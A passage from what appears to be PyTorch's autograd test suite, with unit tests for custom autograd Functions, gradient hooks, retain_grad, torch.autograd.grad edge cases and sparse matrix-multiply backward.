                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
    def test_function_returns_input(self):
        """A Function that returns its input unchanged still routes grads
        through its backward (here doubling them), for both 1-d and scalar
        shapes, and whether or not the input is a leaf."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, grad):
                return grad * 2

        for shape in [(1,), ()]:
            v = torch.ones(shape, requires_grad=True)
            MyFunction.apply(v).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))

            with torch.no_grad():
                v.grad.zero_()
            MyFunction.apply(v.clone()).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
    def test_function_returns_undefined_tensor(self):
        """A backward that returns None yields an undefined grad (x.grad
        stays None), not a zero-filled tensor."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2

            @staticmethod
            def backward(ctx, grad):
                return None

        # Test that undefined tensors returned from custom backward function
        # are propagated as undefined and not tensor full of zeroes
        x = torch.ones(1, requires_grad=True)

        MyFunction.apply(x).backward()
        self.assertIsNone(x.grad)

        MyFunction.apply(x ** 2).backward()
        self.assertIsNone(x.grad)

        MyFunction.apply(x).sum().backward()
        self.assertIsNone(x.grad)

        self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
    def test_materialize_grads(self):
        """By default an undefined incoming grad is materialized as zeros
        before reaching a custom backward."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, grad):
                # UndefinedGrad feeds an undefined grad; materialization
                # should turn it into zeros.
                self.assertEqual(grad, torch.zeros(1))
                return grad

        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_dont_materialize_grads(self):
        """With set_materialize_grads(False), an undefined incoming grad is
        passed to backward as None instead of zeros."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.set_materialize_grads(False)
                return x

            @staticmethod
            def backward(ctx, grad):
                self.assertIsNone(grad)
                return grad

        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_legacy_function_deprecation_exception(self):
        """Calling a legacy-style Function (non-static forward/backward)
        raises the deprecation RuntimeError."""
        # Trigger exception
        class MyFunction(Function):
            def forward(self, x):
                return x

            def backward(self, grad_output):
                return grad_output

        # Check exception occurs
        with self.assertRaisesRegex(
                RuntimeError,
                'Legacy autograd function with non-static forward method is deprecated'):
            MyFunction()(torch.randn(3, 4))
    class SimulateBackwardError(Function):
        """Identity autograd Function whose backward always raises.

        Shared helper used by tests that need to inject a failure into the
        backward pass.
        """

        @staticmethod
        def forward(ctx, input):
            return input.clone()

        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            # Deliberate failure, asserted on by the calling tests.
            raise Exception("Simulate error on backward pass")
    def test_custom_function_exception(self):
        """An exception raised inside a custom backward propagates out of
        .backward() to the caller."""
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)

        tmp = (t1 + t2) * (t1 + t2)
        t3 = TestAutograd.SimulateBackwardError.apply(tmp)
        with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
            t3.sum().backward()
    def test_custom_function_non_tensor_inputs_outputs(self):
        """Custom Functions may mix tensor and non-tensor inputs/outputs;
        non-tensor outputs get None grads in backward and non-tensor inputs
        get no grad slot returned."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale

                # Save scale
                ctx.scale = scale
                ctx.save_for_backward(t1, t2, t3)
                return scale, t4, None, True, t5, "bar", t1

            @staticmethod
            @once_differentiable
            def backward(ctx, *grads):
                # Verify grads: one incoming grad per forward output, with
                # None for the non-tensor outputs (indices 0, 2, 3, 5).
                self.assertEqual(7, len(grads))
                self.assertIsNone(grads[0])
                self.assertIsNone(grads[2])
                self.assertIsNone(grads[3])
                self.assertIsNone(grads[5])

                scale = ctx.scale
                var1, var2, var3 = ctx.saved_tensors
                return (
                    grads[1] * scale + grads[4] * var2 * scale + grads[6],
                    grads[1] * var3 * scale + grads[4] * var1 * scale,
                    None,
                    grads[1] * var2 * scale + grads[4] * scale,
                )

        t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t3 = torch.rand(10, dtype=torch.double)
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])

        # Validate running backward.
        torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
        self.assertIsNotNone(t1.grad)
        self.assertIsNotNone(t2.grad)
        # t3 doesn't require grad, so it must not receive one.
        self.assertIsNone(t3.grad)

        # Test gradcheck
        def foo(t1, t2, t3):
            res = MyFunction.apply(t1, t2, scale, t3)
            return res[1], res[4], res[6]

        gradcheck(foo, (t1, t2, t3))
    def test_custom_function_no_tensors(self):
        """A custom Function applied to only non-tensor (Python scalar)
        inputs still runs forward and returns its outputs untouched."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                return scale, t4, None, True, t5, "bar", t1

            @staticmethod
            @once_differentiable
            def backward(ctx, *args):
                return (args[0], args[1], None, args[2])

        t1 = random.random()
        t2 = random.random()
        t3 = random.random()
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
    def test_invalid_gradients(self):
        """A backward that returns a grad with the wrong shape raises a
        RuntimeError mentioning the expected shape."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2

            @staticmethod
            def backward(ctx, grad_output):
                # Wrong shape on purpose: input is 5x5, grad returned is 10.
                return torch.randn(10, dtype=torch.float)

        with self.assertRaisesRegex(RuntimeError, 'expected shape'):
            input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
            MyFunction.apply(input).sum().backward()
    def test_unrelated_inputs(self):
        """gradcheck/gradgradcheck succeed when one differentiable input is
        unused by the function."""
        # test to ensure grad(grad)check runs successfully even if there is an
        # unrelated (but differentiable) inputs
        def my_function(x, y):
            return x * x

        x = torch.rand(10, dtype=torch.double, requires_grad=True)
        y = torch.rand(10, dtype=torch.double, requires_grad=True)

        gradcheck(my_function, (x, y))
        gradgradcheck(my_function, (x, y))
    def test_not_implemented_grad(self):
        """Backward through an op without a derivative formula raises
        NotImplementedError."""
        a = torch.rand(2, requires_grad=True)
        # if grad for nextafter ends up being implemented, this should be changed
        y = torch.nextafter(a, a).sum()
        with self.assertRaisesRegex(
                NotImplementedError,
                'the derivative for .* is not implemented'):
            y.backward()
def test_not_implemented_fwad(self):
    """Forward-mode AD through an unsupported op raises NotImplementedError."""
    primal = torch.randn(3)
    tangent = torch.rand(3)
    mat = torch.randn(2, 3)

    err_msg = r"Trying to use forward AD with .* that does not support it"
    hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"

    with fwAD.dual_level():
        dual_x = fwAD.make_dual(primal, tangent)
        with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
            # if forward AD ends up being implemented for torch.mv, choose a different op
            res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
    # .grad accumulation strategy: with create_graph=False the engine may
    # add into the existing .grad tensor in place; with create_graph=True
    # it must accumulate out of place, leaving the old .grad untouched.
    grad_output = torch.ones(5, 5)

    def compute_grad(create_graph):
        x = torch.randn(5, 5, requires_grad=True)
        y = x + 2
        y.backward(grad_output, retain_graph=True)
        x_grad = x.grad
        x_grad_clone = x.grad.clone()
        # second backward accumulates into x.grad
        y.backward(grad_output, create_graph=create_graph)
        return x_grad, x_grad_clone

    # Accumulate in-place when create_graph is False
    x_grad, x_grad_clone = compute_grad(create_graph=False)
    self.assertEqual(x_grad, x_grad_clone * 2)

    # Accumulate out-of-place when create_graph is True
    # (original comment said "False", contradicting the call below)
    x_grad, x_grad_clone = compute_grad(create_graph=True)
    self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
    # Checks when accumulating into an existing .grad keeps the same
    # tensor object (in-place accumulation) vs. replaces it with a new one.
    def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
        params = torch.tensor([1.5, 1.5]).requires_grad_()
        params.grad = params_grad_tensor
        grad_saved = params.grad
        params.backward(backward_grad_tensor, create_graph=create_graph)
        # Identity check (not value): was .grad updated in place?
        self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)

    for create_graph in (False, True):
        # Accumulate dense gradient to sparse gradient will change the `params.grad` reference
        _test_grad_tensor(
            torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
            torch.tensor([1.5, 1.5]),
            False,  # never accumulates in-place
            create_graph)

        # Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
        # but only if create_graph=False.
        _test_grad_tensor(
            torch.tensor([1.5, 1.5]),
            torch.tensor([1.5, 1.5]),
            not create_graph,
            create_graph)

        # Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
        # but only if create_graph=False.
        _test_grad_tensor(
            torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
            torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
            not create_graph,
            create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
    a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
    s, logdet = a.slogdet()

    # test that sign should not require grad
    self.assertFalse(s.requires_grad)

    # test that backward through computation involving sign works
    def sign_mul_logdet(mat):
        s, logdet = mat.slogdet()
        return s * logdet

    # Build matrices with a controlled determinant sign via the SVD of a:
    # clamp singular values away from zero, then force the last one to
    # +/-1 to flip the determinant's sign.
    u, s, v = a.detach().svd()
    s.abs_().clamp_(0.0001)
    for sign in (-1, 1):
        s[-1] = sign
        mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
        gradcheck(sign_mul_logdet, mat)
        gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
    # Broadcasting a (4, 1) tensor against an empty (4, 0) one: backward
    # must reduce the empty gradient back to each input's own shape.
    left = torch.rand(4, 0, requires_grad=True)
    right = torch.rand(4, 1, requires_grad=True)

    total = left + right
    assert total.shape == (4, 0)
    total.sum().backward()

    self.assertEqual(right.grad, torch.zeros(4, 1))
    self.assertEqual(left.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
    # Double backward as a Hessian-vector product: the second backward()
    # accumulates H*v on top of the first-order grads already in .grad.
    x = torch.randn(2, 2, requires_grad=True)
    y = torch.randn(2, 2, requires_grad=True)

    z = x ** 2 + y * x + y ** 2
    z.backward(torch.ones(2, 2), create_graph=True)

    with torch.no_grad():
        x_grad = 2 * x + y
        y_grad = x + 2 * y
    self.assertEqual(x.grad, x_grad)
    self.assertEqual(y.grad, y_grad)

    # Backward through the grads themselves adds the HVP to .grad.
    grad_sum = 2 * x.grad + y.grad
    grad_sum.backward(torch.ones(2, 2))
    x_hv = torch.ones(2, 2) * 5
    y_hv = torch.ones(2, 2) * 4
    self.assertEqual(x.grad, x_grad + x_hv)
    self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
    """torch.autograd.grad: HVP computation, .grad preservation, and
    shape validation of grad_outputs against outputs."""
    x = torch.randn(2, 2, requires_grad=True)
    y = torch.randn(2, 2, requires_grad=True)
    z = x ** 2 + y * x + y ** 2
    z.backward(torch.ones(2, 2), create_graph=True)

    x_grad = 2 * x + y
    y_grad = x + 2 * y
    self.assertEqual(x.grad, x_grad)
    self.assertEqual(y.grad, y_grad)

    grad_sum = 2 * x.grad + y.grad
    x_hv = torch.autograd.grad(
        outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
        inputs=[x], create_graph=True)
    expected_x_hv = torch.ones(2, 2) * 5

    self.assertEqual(x_hv[0], expected_x_hv)
    # grad() must not touch the .grad fields of its inputs.
    self.assertEqual(x.grad, x_grad)
    self.assertEqual(y.grad, y_grad)

    # Test that grad_outputs and outputs have the same shape
    grad_out = torch.ones(2)
    try:
        torch.autograd.grad(
            outputs=[grad_sum], grad_outputs=[grad_out],
            inputs=[x], create_graph=True)
        # BUG FIX: was `self.assertFail()`, which does not exist on
        # unittest.TestCase and would raise AttributeError instead of a
        # clean test failure if grad() did not raise.
        self.fail("expected a shape-mismatch RuntimeError")
    except RuntimeError as error:
        self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
                         + str(grad_out.shape) + " and output[0] has a shape of "
                         + str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
    # Gradient-ascent-style loop using torch.autograd.grad on a non-leaf
    # tensor: .grad fields must stay unset until the final explicit
    # backward() call.
    x_init = torch.randn(2, 2, requires_grad=True)
    x = x_init
    y = torch.randn(2, 2, requires_grad=True)
    grad_output = torch.ones(2, 2)

    def fn(x):
        return x ** 2 + y * x + y ** 2

    for _ in range(5):
        grad_x, = torch.autograd.grad(
            fn(x), x, grad_outputs=grad_output, create_graph=True)

        grad_x_expected = 2 * x + y
        # grad() must not populate .grad on either tensor.
        self.assertIsNone(y.grad)
        self.assertIsNone(x.grad)
        self.assertEqual(grad_x, grad_x_expected)

        # ascend along the gradient
        x = x + 0.05 * grad_x

    val_init = fn(x_init).sum()
    val_final = fn(x).sum()
    # ascent must have increased the objective
    self.assertGreater(val_final, val_init)

    x.backward(grad_output)
    self.assertIsNotNone(y.grad)
    self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
    # This checks an edge case for function callbacks
    # We want to capture two grads of a function, but can only
    # register a single callback.
    x = torch.randn(4, 2, requires_grad=True)
    a, b = x.chunk(2)

    def hook(*grads):
        hook_called[0] = True
    hook_called = [False]
    x.register_hook(hook)

    go = torch.randn(2, 2)
    grad_a, grad_b = torch.autograd.grad(
        (a + 2 * b), [a, b], grad_outputs=go, create_graph=True)

    self.assertEqual(grad_a, go)
    self.assertEqual(grad_b, go * 2)
    # grad() stopped at a and b, so the hook on x must not have fired
    # and x.grad must remain unset.
    self.assertFalse(hook_called[0])
    self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
    # This checks an edge case for register_hook.
    # We want to capture grad of a nonleaf tensor,
    # but avoid segfault during backward of other nonleaf tensors
    x = torch.randn(5, requires_grad=True)
    x_list = x.unbind()

    x0 = x_list[0]
    hook_results = [None]

    def hook(grad):
        hook_results[0] = grad
    x0.register_hook(hook)

    x_list[0].backward()
    self.assertEqual(hook_results[0], torch.tensor(1.))
    expected_grad = torch.tensor([1., 0, 0, 0, 0])
    self.assertEqual(x.grad, expected_grad)
    self.assertIsNone(x_list[0].grad)

    for i in range(1, 5, 1):
        x_list[i].backward()
        # NOTE(review): this expects hook_results[0] to be None after
        # backward through a *sibling* unbind output, i.e. the hook on x0
        # observes a None gradient here rather than not firing at all —
        # confirm against the hook semantics for multi-output grad_fns.
        self.assertEqual(hook_results[0], None)
        expected_grad[i] = 1.0
        self.assertEqual(x.grad, expected_grad)
        self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
    # A hook that lacks a __name__ attribute (a callable object rather
    # than a function) must still be accepted by register_hook.
    class NamelessHook:
        def __call__(self, grad):
            return grad.clone()

    t = torch.randn(5, requires_grad=True).clone()
    t.register_hook(NamelessHook())
    t.sum().backward()
    # Should run fine
def test_sharded_grad(self):
    # Compute d(loss)/d(intermediate) in small shards via grad(), then
    # finish the backward pass from the intermediates; leaf grads must
    # match the analytic values.
    leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
    intermediates = [l * i + l * l for i, l in enumerate(leaves)]
    loss = sum(v * i for i, v in enumerate(intermediates)).sum()

    # define a helper for dividing intermediates into groups
    def group(l, group_size):
        return (l[i:i + group_size] for i in range(0, len(l), group_size))

    # Compute the d loss / d intermediates in chunks of shard_size
    shard_size = 2
    d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
                       for d_i in torch.autograd.grad(loss, intermediates_batch)]
    # Compute rest of backward pass
    torch.autograd.backward(intermediates, d_intermediates)

    for i, l in enumerate(leaves):
        # d loss/dl = i*(i + 2l); since l == 0 here, both that and
        # i*i*(1+l) evaluate to i*i, so the comparison holds.
        self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
    # backward() on a tensor that does not require grad must raise.
    t = torch.ones(1)
    with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
        t.backward()
def test_grad_badcalls(self):
    # grad() must reject calls where either endpoint does not require grad.
    t = torch.ones(1)
    sq = t ** 2
    with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
        torch.autograd.grad(t, sq)
    with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
        torch.autograd.grad(sq, t)

    t = torch.ones(1, requires_grad=True)
    sq = t ** 2
    torch.autograd.grad(sq, t)  # this should succeed now
def test_grad_empty_inputs(self):
    # An empty `inputs` list is rejected with a ValueError.
    leaf = torch.tensor([1.0], requires_grad=True)
    with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
        torch.autograd.grad(2 * leaf, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
    # Calling a grad_fn directly validates its argument count.
    error_regex = 'expected .* arguments, got .* instead'
    leaf = torch.ones(1, requires_grad=True)
    out = leaf ** 2

    with self.assertRaisesRegex(TypeError, error_regex):
        out.grad_fn(leaf.detach(), leaf.detach())  # too many
    with self.assertRaisesRegex(TypeError, error_regex):
        out.grad_fn()  # too few

    out.grad_fn(leaf.detach())  # this should succeed
def test_grad_unreachable(self):
    # allow_unused=True returns None for inputs unreachable from the
    # outputs; allow_unused=False raises instead.
    x = torch.ones(1, requires_grad=True)
    y = torch.ones(1, requires_grad=True)
    # Make sure x and y have grad accumulators allocated
    z = x * 2
    w = y * 2

    grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
    self.assertEqual(grad_x, x * 2)
    self.assertIsNone(grad_y)

    # This is slightly different than the case above, because z doesn't even
    # have a grad accumulator allocated.
    z = torch.ones(1, requires_grad=True)
    grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
    self.assertEqual(grad_x, x * 2)
    self.assertIsNone(grad_z)

    # allow_unused=False, but grads contains None inside, should throw
    with self.assertRaisesRegex(RuntimeError,
                                "Set allow_unused=True"):
        grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
    # Test that certain nodes are not erroneously executed when an input
    # is unreachable. See #39784
    class MyFunc(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, x):
            # Reaching this backward means the engine scheduled a node
            # that cannot contribute to any requested input.
            self.fail("This node should not be executed!")

    # Output unreachable from the only requested input y.
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    (gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
    self.assertIsNone(gY)

    # Mixed case: z is reachable, y is not.
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    z = torch.randn(1, requires_grad=True)
    (gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
    self.assertIsNone(gY)
    self.assertIsNotNone(gZ)

    # Same discovery logic through backward(inputs=...).
    x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
    y = torch.randn(1, requires_grad=True)
    torch.autograd.backward(x, inputs=(y, ))  # allow_unused is implicitly True!
    self.assertIsNone(y.grad)
def test_hooks(self):
    # Hook registration/removal bookkeeping: `counter` records which of
    # the registered hooks fired on each backward pass.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    y.requires_grad_(True)

    counter = [0]

    def bw_hook(inc, grad):
        self.assertIsInstance(grad, torch.Tensor)
        counter[0] += inc

    z = x ** 2 + x * 2 + x * y + y
    x.register_hook(lambda *args: bw_hook(0, *args))
    test = z.register_hook(lambda *args: bw_hook(1, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    # only the inc=1 hook on z contributes
    self.assertEqual(counter[0], 1)

    test2 = z.register_hook(lambda *args: bw_hook(2, *args))
    z.backward(torch.ones(5, 5), retain_graph=True)
    # both hooks on z fire: +1 +2
    self.assertEqual(counter[0], 4)

    test2.remove()
    z.backward(torch.ones(5, 5), retain_graph=True)
    # the removed hook no longer fires: +1
    self.assertEqual(counter[0], 5)

    def bw_hook_modify(grad):
        return grad.mul(2)

    test.remove()
    z.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5), retain_graph=True)
    # z's gradient is doubled by the hook before reaching y
    self.assertEqual(y.grad, (x + 1) * 2)

    y.register_hook(bw_hook_modify)
    with torch.no_grad():
        y.grad.zero_()
    z.backward(torch.ones(5, 5))
    # doubled twice: once at z, once at y
    self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
    # Tests hooks for autograd function implemented in C++
    bn = torch.nn.BatchNorm1d(5, affine=False)
    bn.double()
    bn.eval()

    invocations = [0]

    def doubling_hook(grad):
        invocations[0] += 1
        return grad * 2

    inp = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
    out = bn(inp)
    out.register_hook(doubling_hook)
    out.sum().backward()

    self.assertEqual(invocations[0], 1, msg='bw_hook not called')
    self.assertEqual(inp.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
    # WARNING: this is a test for autograd internals.
    # You should never have to use such things in your code.
    class NoneGradientFunction(Function):
        @staticmethod
        def forward(ctx, x, y):
            assert ctx.needs_input_grad[0]
            assert not ctx.needs_input_grad[1]
            return x, y

        @staticmethod
        def backward(ctx, grad_x, grad_y):
            # y did not require grad, so its gradient slot is None.
            return grad_x, None

    was_called = [False]

    def hook(grad):
        # hooks on both outputs must still receive a real tensor
        self.assertIsNotNone(grad)
        was_called[0] = True

    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5)
    rx, ry = NoneGradientFunction.apply(x, y)
    rx.register_hook(hook)
    ry.register_hook(hook)
    # BUG FIX: this used the Python builtin `sum(rx, ry)` — i.e.
    # ry + rx[0] + ... + rx[4], summing rows of rx with ry as the start
    # value. Gradients still reached both hooks, but only by accident;
    # the intended expression is the elementwise sum of the two outputs.
    (rx + ry).sum().backward()
    self.assertTrue(was_called[0])
def test_retain_grad(self):
    input = torch.rand(1, 3, requires_grad=True)
    h1 = input * 3
    out = (h1 * h1).sum()

    # It should be possible to call retain_grad() multiple times
    h1.retain_grad()
    h1.retain_grad()

    # Gradient should be accumulated
    # d(out)/d(h1) = 2 * h1
    out.backward(retain_graph=True)
    self.assertEqual(h1 * 2, h1.grad)
    out.backward(retain_graph=True)
    self.assertEqual(h1 * 4, h1.grad)

    with torch.no_grad():
        input.grad.zero_()
    # It should be a no-op for leaves
    input.retain_grad()
    input.retain_grad()
    out.backward()
    # d(out)/d(input) = 2 * h1 * 3 = 18 * input
    self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
    # retain_grad() must not create a reference cycle that keeps the
    # retained tensor alive after it goes out of scope.
    x = torch.ones(5, 5, requires_grad=True)

    def run_test():
        y = x * 2
        y.retain_grad()
        # return something downstream of y plus a weak ref to y itself
        return y / 2, torch._C._WeakTensorRef(y)

    z, ref = run_test()
    # y must already be dead even though its graph is still reachable via z
    self.assertTrue(ref.expired())
    z.sum().backward()
def test_backward(self):
    # End-to-end analytic-gradient check for a mixed arithmetic expression.
    v = torch.randn(5, 5, requires_grad=True)
    x = torch.randn(5, 5, requires_grad=True)
    # keep y bounded away from zero: it appears in denominators below
    y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
    z = torch.randn(5, 5, requires_grad=True)
    grad_output = torch.randn(5, 5)

    # identity: grad of v w.r.t. itself is grad_output
    v.backward(grad_output)
    self.assertEqual(v.grad, grad_output)

    a = x + (y * z) + 4 * z ** 2 * x / y
    a.backward(grad_output)
    x_grad = 4 * z.pow(2) / y + 1
    y_grad = z - 4 * x * z.pow(2) / y.pow(2)
    z_grad = 8 * x * z / y + y
    self.assertEqual(x.grad, x_grad * grad_output)
    self.assertEqual(y.grad, y_grad * grad_output)
    self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
    # Sparse/dense matmul backward support matrix: only some sparse
    # operand combinations have gradients implemented; the rest must
    # raise with a message naming the offending operand.
    size = (3, 3)
    sparse = torch.sparse_coo_tensor(size, requires_grad=True)
    dense = torch.randn(size, requires_grad=True)

    with self.assertRaisesRegex(
            RuntimeError,
            "The backward pass for this operation requires the 'mat1' tensor to be strided,"):
        z = dense.addmm(sparse, dense)

    mm_test_cases = [
        # a requires grad, a is sparse, b requires grad, b is sparse, error message
        (False, True, True, False, None),
        (False, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (False, True, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, False, True, True, "The backward pass for this operation requires the 'mat2'"),
        (True, True, False, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, False, "The backward pass for this operation requires the 'self'"),
        (True, True, True, True, "The backward pass for this operation requires the 'mat2'"),
    ]
    for a_req_grad, a_is_sparse, b_req_grad, b_is_sparse, err_msg in mm_test_cases:
        # We should only be testing cases with sparse inputs, and at least one
        # input needs to require grad so we can call a backward pass
        assert a_is_sparse or b_is_sparse
        assert a_req_grad or b_req_grad

        a = torch.randn(size, requires_grad=a_req_grad)
        if a_is_sparse:
            a = a.to_sparse()
        b = torch.randn(size, requires_grad=b_req_grad)
        if b_is_sparse:
            b = b.to_sparse()

        # If no error expected, check that sparse and dense cases match
        if err_msg is None:
            r = a.mm(b)
            r.sum().backward()
            a_grad = None if a.grad is None else a.grad.clone().detach()
            b_grad = None if b.grad is None else b.grad.clone().detach()

            # Redo with only dense tensors
            a = (a.to_dense() if a.is_sparse else a).clone().detach()
            a.requires_grad = a_req_grad
            b = (b.to_dense() if b.is_sparse else b).clone().detach()
            b.requires_grad = b_req_grad
            r = a.mm(b)
            r.sum().backward()

            self.assertEqual(a_grad, a.grad)
            self.assertEqual(b_grad, b.grad)
        else:
            with self.assertRaisesRegex(RuntimeError, err_msg):
                a.mm(b)
def test_multi_backward(self):
    # backward() over several roots at once accumulates into every leaf.
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    q = torch.randn(5, 5, requires_grad=True)

    a = torch.randn(5, 5, requires_grad=True)
    b = torch.randn(5, 5, requires_grad=True)

    q2 = q * 2
    z = x + y + q2
    c = a * b + q2
    grad_z = torch.randn(5, 5)
    grad_c = torch.randn(5, 5)
    torch.autograd.backward([z, c], [grad_z, grad_c])

    self.assertEqual(x.grad, grad_z)
    self.assertEqual(y.grad, grad_z)
    self.assertEqual(a.grad, grad_c * b)
    self.assertEqual(b.grad, grad_c * a)
    # q feeds both roots through q2, so its grad is the summed upstream
    # gradient times 2
    self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=False)

    z = x + y
    q = y * 2

    # NB: we currently raise an exception if any arguments to backwards
    # have requires_grad=False and don't have a grad_fn. We may want to
    # relax that check to a warning.
    self.assertRaises(
        RuntimeError,
        lambda: torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)]))
def test_backward_with_inputs(self):
    # backward(..., inputs=...) must accumulate only into the listed
    # inputs, leaving all other .grad fields untouched (zero after reset).
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    def fn():
        return x ** 2 + y * x + y ** 2

    gradient = torch.ones(2, 2)
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y

    @torch.no_grad()
    def reset_grad():
        x.grad.zero_()
        y.grad.zero_()

    torch.autograd.backward(fn(), gradient, inputs=[x, y])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, y_grad_expected)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[x])
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    torch.autograd.backward(fn(), gradient, inputs=[y])
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    # a bare tensor (not wrapped in a list) is also accepted for `inputs`
    torch.autograd.backward(fn(), gradient, inputs=y)
    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)

    reset_grad()
    self.assertRaisesRegex(RuntimeError, 'cannot be empty',
                           lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
    # backward(inputs=...) also accumulates into non-leaf tensors when
    # they are listed explicitly.
